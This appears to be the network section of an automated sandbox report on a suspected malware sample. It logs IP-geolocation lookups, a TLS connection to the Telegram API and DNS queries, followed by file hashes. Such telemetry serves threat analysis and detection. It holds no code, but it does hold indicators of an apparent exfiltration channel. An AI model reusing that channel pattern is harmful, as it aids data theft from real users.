GET https://reallyfreegeoip.org/xml/138.199.29.44
HTTP Response
200
HTTP Request
GET https://reallyfreegeoip.org/xml/138.199.29.44
HTTP Response
200
HTTP Request
GET https://reallyfreegeoip.org/xml/138.199.29.44
HTTP Response
200
HTTP Request
GET https://reallyfreegeoip.org/xml/138.199.29.44
HTTP Response
200
-
Destination: 149.154.167.220:443
Title: api.telegram.org
Protocol: tls
Process: be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
Traffic: 388 B sent, 179 B received, 5 packets sent, 4 packets received
-
Traffic: 61 B sent, 77 B received, 1 packet sent, 1 packet received
DNS Request
mertvinc.com.tr
DNS Response
185.244.144.68
-
Destination: 8.8.8.8:53
Title: checkip.dyndns.org
Protocol: dns
Process: be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
Traffic: 64 B sent, 176 B received, 1 packet sent, 1 packet received
DNS Request
checkip.dyndns.org
DNS Response
132.226.8.169
193.122.130.0
132.226.247.73
193.122.6.168
158.101.44.242
-
Destination: 8.8.8.8:53
Title: reallyfreegeoip.org
Protocol: dns
Process: be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
Traffic: 65 B sent, 97 B received, 1 packet sent, 1 packet received
DNS Request
reallyfreegeoip.org
DNS Response
172.67.177.134
104.21.67.152
-
Destination: 8.8.8.8:53
Title: api.telegram.org
Protocol: dns
Process: be0b05580938cea205cb3e035bf9f814327b30a59ea80bae55255530519d1fcd.exe
Traffic: 62 B sent, 78 B received, 1 packet sent, 1 packet received
DNS Request
api.telegram.org
DNS Response
149.154.167.220
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
11KB
MD5
fc90dfb694d0e17b013d6f818bce41b0
SHA1
3243969886d640af3bfa442728b9f0dff9d5f5b0
SHA256
7fe77ca13121a113c59630a3dba0c8aaa6372e8082393274da8f8608c4ce4528
SHA512
324f13aa7a33c6408e2a57c3484d1691ecee7c3c1366de2bb8978c8dc66b18425d8cab5a32d1702c13c43703e36148a022263de7166afdce141da2b01169f1c6